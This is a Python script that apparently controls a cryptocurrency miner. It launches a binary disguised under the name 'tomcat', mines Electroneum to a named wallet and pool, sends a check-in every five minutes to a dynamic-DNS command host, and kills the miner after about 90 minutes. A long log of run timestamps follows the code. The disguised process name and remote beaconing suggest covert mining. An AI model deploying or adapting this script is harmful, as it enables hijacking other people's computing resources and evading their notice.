import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:31:06.689019
#2018-02-17 16:17:04.812397
#2018-02-17 18:04:07.196329
#2018-02-17 19:51:07.229034
#2018-02-17 21:39:04.052864
#2018-02-17 23:24:02.191301
#2018-02-18 01:13:04.047940
#2018-02-18 03:01:03.417526
#2018-02-18 04:50:06.330937
#2018-02-18 06:40:06.930630
#2018-02-18 08:29:04.465371
#2018-02-18 10:17:04.730761
#2018-02-18 12:03:06.470820
#2018-02-18 13:48:05.808977
#2018-02-18 15:39:02.070286
#2018-02-18 17:28:02.192985
#2018-02-18 19:15:06.448699
#2018-02-18 21:01:01.916675
#2018-02-18 22:47:04.019433
#2018-02-19 00:36:07.314885
#2018-02-19 02:22:01.323480
#2018-02-19 04:08:07.551754
#2018-02-19 05:52:06.484314
#2018-02-19 07:42:01.660990
#2018-02-19 09:31:05.344086
#2018-02-19 11:21:06.108891
#2018-02-19 13:08:06.520348
#2018-02-19 14:56:07.976617
#2018-02-19 16:43:08.404555
#2018-02-19 18:29:01.798561
#2018-02-19 20:16:07.284785
#2018-02-19 22:05:04.439943
#2018-02-19 23:50:11.407870
#2018-02-20 01:37:01.577934
#2018-02-20 03:25:04.398411
#2018-02-20 05:12:06.189550
#2018-02-20 06:55:04.527299
#2018-02-20 08:42:06.316248
#2018-02-20 10:26:05.550473
#2018-02-20 12:10:10.031410
#2018-02-20 13:59:05.284367
#2018-02-20 15:42:10.793817
#2018-02-20 17:28:08.316775
#2018-02-20 19:17:04.686710
#2018-02-20 21:05:07.890904
#2018-02-20 22:51:06.876002
#2018-02-21 00:35:04.332928
#2018-02-21 02:21:07.398019
#2018-02-21 04:08:04.733424
#2018-02-21 05:55:08.761532
#2018-02-21 07:43:04.574747
#2018-02-21 09:27:08.278492
#2018-02-21 11:16:01.619856
#2018-02-21 13:03:10.633537
#2018-02-21 14:50:08.470280
#2018-02-21 16:37:04.149617
#2018-02-21 18:26:04.129104
#2018-02-21 20:13:04.476425
#2018-02-21 22:03:01.391469
#2018-02-21 23:50:08.641651
#2018-02-22 01:39:04.755682
#2018-02-22 03:26:04.642988
#2018-02-22 05:13:04.981982
#2018-02-22 06:57:03.975688
#2018-02-22 08:44:07.732676
#2018-02-22 10:33:07.530998
#2018-02-22 12:19:04.387218
#2018-02-22 14:02:07.875921
#2018-02-22 15:50:13.438896
#2018-02-22 17:37:07.514862
#2018-02-22 19:23:04.769291
#2018-02-22 21:15:04.195314
#2018-02-22 22:59:08.509395
#2018-02-23 00:45:13.431088
#2018-02-23 02:34:07.828484
#2018-02-23 04:23:06.739155
#2018-02-23 06:08:08.023965
#2018-02-23 07:55:07.540229
#2018-02-23 10:13:03.687901
#2018-02-23 12:05:09.789690
#2018-02-23 13:52:02.050002
#2018-02-23 15:43:05.903491
#2018-02-23 17:29:05.844008
#2018-02-23 19:17:05.697019
#2018-02-23 21:02:02.190428
#2018-02-23 22:49:06.441659
#2018-02-24 00:37:04.423894
#2018-02-24 02:26:08.238228
#2018-02-24 04:17:01.900933
#2018-02-24 06:04:06.138672
#2018-02-24 07:52:04.972097
#2018-02-24 09:36:07.848609
#2018-02-24 11:31:01.563220
#2018-02-24 13:20:07.757607
#2018-02-24 15:10:08.426462
#2018-02-24 16:58:04.114067
#2018-02-24 18:46:06.475523
#2018-02-24 20:38:02.122536
#2018-02-24 22:44:04.056278
#2018-02-25 02:06:03.515851
#2018-02-25 05:53:01.926782
#2018-02-25 11:38:01.558422